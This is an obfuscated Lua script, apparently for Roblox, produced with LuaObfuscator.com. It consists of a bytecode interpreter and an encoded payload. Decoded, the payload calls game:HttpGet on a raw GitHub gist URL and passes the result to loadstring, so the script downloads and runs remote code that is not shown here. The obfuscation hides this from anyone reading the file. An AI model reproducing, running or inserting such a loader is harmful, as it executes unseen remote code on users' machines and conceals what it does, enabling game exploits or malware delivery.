--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v118=v5(v88,v19);v19=nil;return v118;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/(2^(v32-(2 -1))))%(2^(((v33-(2 -(1 + 0))) -(v32-(1 -0))) + (2 -1))) ;return v89-(v89%(620 -(555 + 64))) ;else local v90=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v90 + v90))>=v90) and 1) or ((146 + 781) -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=877 -(282 + 595) ;local v36;local v37;while true do if (v35==(1638 -(1523 + 114))) then return (v37 * (231 + 25)) + v36 ;end if (v35==((0 -0) -0)) then v36,v37=v1(v16,v18,v18 + ((1184 -(32 + 85)) -(68 + 997)) );v18=v18 + 2 ;v35=1271 -(226 + 1024 + 20) ;end end end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(957 -(892 + 65))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v38=1 -0 ;end if (v38==(1 -0)) then return (v42 * (16777566 -(87 + 193 + 70))) + (v41 * 65536) + (v40 * ((1070 -634) -(67 + 113))) + v39 ;end end end local function v24() local v43=430 -(44 + 386) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 + 0)) then v48=v20(v45,83 -62 ,983 -(802 + 150) );v49=((v20(v45,32)==(2 -1)) and  -1) or (1 -0) ;v43=3 + 0 ;end if (v43==(997 -(915 + (1568 -(998 + 488))))) then v44=v23();v45=v23();v43=1;end if (v43==(8 -5)) then if (v48==(0 + 0 + 0)) then if (v47==((0 + 0) -0)) then return v49 * (1187 -((1841 -(201 + 571)) + 118)) ;else v48=2 -1 ;v46=0 -0 ;end elseif (v48==(356 + 1691)) then return ((v47==(0 -0)) and (v49 * (1/0))) or (v49 * NaN) ;end return v8(v49,v48-(1015 + 8) ) * (v46 + (v47/((793 -(368 + (1561 -(116 + 1022))))^(163 -111)))) ;end if ((19 -(10 + 8))==v43) then v46=3 -2 ;v47=(v20(v45,443 -(416 + 26) ,63 -43 ) * ((1 + 1)^(56 -24))) + v44 ;v43=440 -(145 + 293) ;end end end local function v25(v50) local v51;if  not v50 then local v91=0 -0 ;while true do if (v91==(0 + (0 -0))) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -((1 + 2) -2) );v18=v18 + v50 ;local v52={};for v69=860 -(814 + 45) , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92==0) then local v123=(function() return 1002 -(241 + 761) ;end)();local v124=(function() return;end)();while true do if (v123~=(0 + 0)) then else v124=(function() return 0 + 0 ;end)();while true do if (v124==(0 -0)) then v93=(function() return v94();end)();v95=(function() return nil;end)();v124=(function() return 3 -2 ;end)();end if ((375 -(123 + 251))~=v124) then else v92=(function() return  #"\\";end)();break;end end break;end end end if ( #"\\"==v92) then if (v93== #"!") then v95=(function() return v94()~=(0 -0) ;end)();elseif (v93==2) then v95=(function() return v96();end)();elseif (v93== #"xxx") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v54=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 698 -(208 + 490) ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do local v117=(function() return 0;end)();while true do if ((0 + 0)~=v117) then else if (v109~=(1 + 0)) then else local v128=(function() return 836 -(660 + 176) ;end)();while true do if (0==v128) then while true do if (v100~=0) then else v101=(function() return v102();end)();if (v103(v101, #"~", #"}")==(0 + 0)) then local v164=(function() return 202 -(14 + 188) ;end)();local v165=(function() return;end)();local v166=(function() return;end)();local v167=(function() return;end)();while true do if (v164==(678 -(534 + 141))) then if (v103(v166, #"19(", #"19(")== #",") then v167[ #"xnxx"]=(function() return v106[v167[ #"http"]];end)();end v107[v108]=(function() return v167;end)();break;end if (2==v164) then if (v103(v166, #"}", #"}")~= #"{") then else v167[1 + 1 ]=(function() return v106[v167[2 + 0 ]];end)();end if (v103(v166,2 + 0 ,2)== #"}") then v167[ #"xxx"]=(function() return v106[v167[ #"xnx"]];end)();end v164=(function() return 6 -3 ;end)();end if (v164==(1 -0)) then local v180=(function() return 0 -0 ;end)();while true do if (v180==(1 + 0)) then v164=(function() return 2 + 0 ;end)();break;end if (v180~=(396 -(115 + 281))) then else v167=(function() return {v104(),v104(),nil,nil};end)();if (v165==0) then local v186=(function() return 0 + 0 ;end)();local v187=(function() return;end)();while true do if (v186~=0) then else v187=(function() return 0 -0 ;end)();while true do if (0~=v187) then else v167[ #"-19"]=(function() return v104();end)();v167[ #".dev"]=(function() return v104();end)();break;end end break;end end elseif (v165== #"[") then v167[ #"xxx"]=(function() return v105();end)();elseif (v165==(7 -5)) then v167[ #"91("]=(function() return v105() -(2^16) ;end)();elseif (v165~= #"19(") then else local v192=(function() return 867 -(550 + 317) ;end)();local v193=(function() return;end)();while true do if (v192==0) then v193=(function() return 0 -0 ;end)();while true do if (v193==(0 -0)) then v167[ #"xxx"]=(function() return v105() -((5 -3)^16) ;end)();v167[ #"xnxx"]=(function() return v104();end)();break;end end break;end end end v180=(function() return 1;end)();end end end if (v164==(285 -(134 + 151))) then local v181=(function() return 0;end)();while true do if (v181~=(1666 -(970 + 695))) then else v164=(function() return 1;end)();break;end if (v181==(0 -0)) then local v185=(function() return 1990 -(582 + 1408) ;end)();while true do if (0~=v185) then else v165=(function() return v103(v101,2, #"asd");end)();v166=(function() return v103(v101, #".com",6);end)();v185=(function() return 3 -2 ;end)();end if (v185~=(1 -0)) then else v181=(function() return 1;end)();break;end end end end end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end if (v109~=(0 -0)) then else v100=(function() return 0;end)();v101=(function() return nil;end)();v109=(function() return 1;end)();end break;end end end end;end)();local v55=(function() return function(v110,v111,v112) local v113=(function() return 1824 -(1195 + 629) ;end)();local v114=(function() return;end)();while true do if (v113==0) then v114=(function() return 0 -0 ;end)();while true do if (v114==0) then local v129=(function() return 241 -(187 + 54) ;end)();while true do if (v129~=(780 -(162 + 618))) then else local v130=(function() return 0;end)();while true do if ((0 + 0)==v130) then v110[v111-#"}" ]=(function() return v112();end)();return v110,v111,v112;end end end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #"|",v60 do FlatIdent_8199B,Type,v21,Cons,v24,v25,v61,v71=(function() return v53(FlatIdent_8199B,Type,v21,Cons,v24,v25,v61,v71);end)();end v59[ #"gha"]=(function() return v21();end)();for v72= #" ",v23() do FlatIdent_5ED46,Descriptor,v21,v20,v22,v23,v61,v56,v72=(function() return v54(FlatIdent_5ED46,Descriptor,v21,v20,v22,v23,v61,v56,v72);end)();end for v73= #"|",v23() do v57,v73,v28=(function() return v55(v57,v73,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1 + 0 + 0 ];local v67=v63[3 -1 ];local v68=v63[(11 -7) -1 ];return function(...) local v74=v66;local v75=v67;local v76=v68;local v77=v27;local v78=1;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -1 ;local v83={};local v84={};for v115=0,v82 do if ((786<3023) and (v115>=v76)) then v80[v115-v76 ]=v81[v115 + 1 ];else v84[v115]=v81[v115 + ((2710 -1709) -(451 + 549)) ];end end local v85=(v82-v76) + 1 ;local v86;local v87;while true do local v116=0;while true do if ((1 + 0)==v116) then if (v87<=6) then if (v87<=((116 -(4 + 110)) -0)) then if ((v87<=(0 -0)) or (2442<74)) then local v131=v86[1386 -(746 + 638) ];local v132,v133=v77(v84[v131](v13(v84,v131 + 1 + 0 ,v86[3])));v79=(v133 + v131) -(1 -0) ;local v134=341 -(218 + 123) ;for v135=v131,v79 do v134=v134 + (1582 -(1535 + 46)) ;v84[v135]=v132[v134];end elseif (v87>(1 + 0)) then local v138=0 + 0 ;local v139;while true do if (v138==(560 -(306 + 254))) then v139=v86[(585 -(57 + 527)) + 1 ];v84[v139]=v84[v139](v13(v84,v139 + (1 -0) ,v79));break;end end else local v140=0;local v141;local v142;local v143;local v144;while true do if (v140==1) then v79=(v143 + v141) -(1468 -(899 + (1995 -(41 + 1386)))) ;v144=0 + 0 ;v140=4 -2 ;end if ((603 -(268 + (438 -(17 + 86))))==v140) then v141=v86[292 -(60 + 230) ];v142,v143=v77(v84[v141](v13(v84,v141 + (573 -(426 + 146)) ,v86[1 + 0 + 2 ])));v140=1457 -((628 -346) + 1174) ;end if ((4535==4535) and (v140==2)) then for v176=v141,v79 do v144=v144 + 1 ;v84[v176]=v142[v144];end break;end end end elseif ((v87<=(815 -(569 + 242))) or (3009<=2105)) then if (v87>3) then do return;end else v84[v86[5 -3 ]]=v86[1 + 2 ];end elseif (v87>((2979 -1950) -(706 + 318))) then local v147=1251 -(721 + (696 -(122 + 44))) ;local v148;local v149;while true do if (v147==(0 -0)) then v148=v86[1273 -(945 + (1081 -755)) ];v149=v84[v86[(6 + 1) -4 ]];v147=1 + 0 + 0 ;end if (v147==((1419 -718) -(271 + 429))) then v84[v148 + (66 -(30 + 35)) + 0 ]=v149;v84[v148]=v149[v86[1504 -(1408 + 92) ]];break;end end else local v150=v86[1088 -(461 + 625) ];v84[v150]=v84[v150](v13(v84,v150 + 1 ,v79));end elseif ((1830<3669) and (v87<=(1297 -(993 + 295)))) then if ((v87<=(1 + 6)) or (1430>=3612)) then v84[v86[1173 -(418 + 753) ]]();elseif ((2683>=2460) and (v87>(4 + 3 + 1))) then v84[v86[1 + 1 ]]=v65[v86[1 + (1259 -(1043 + 214)) ]];else v84[v86[2]]=v86[1 + 2 ];end elseif (v87<=11) then if (v87>(539 -(406 + 123))) then do return;end else local v156=v86[1771 -(1749 + 20) ];local v157=v84[v86[1 + 2 ]];v84[v156 + (1323 -(1249 + (275 -202))) ]=v157;v84[v156]=v157[v86[2 + (1214 -(323 + 889)) ]];end elseif ((v87==(1157 -(466 + 679))) or (1804>=3275)) then v84[v86[(10 -6) -2 ]]=v65[v86[3]];else v84[v86[2]]();end v78=v78 + 1 ;break;end if (((0 -0)==v116) or (1417>3629)) then v86=v74[v78];v87=v86[1901 -(106 + (2374 -(361 + 219))) ];v116=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403873Q00682Q7470733A2Q2F676973742E67697468756275736572636F6E74656E742E636F6D2F6861746169666E782F652Q3635373038313261353038323466643632333734613938332Q31336661352F7261772F316261303637623163313865626336623233613563612Q37313833356463363830642Q38642Q63662F6769737466696C65312E74787400083Q0012093Q00013Q001209000100023Q00200A000100010003001208000300046Q000100034Q00025Q00022Q00073Q000100012Q000B3Q00017Q00",v9(),...);
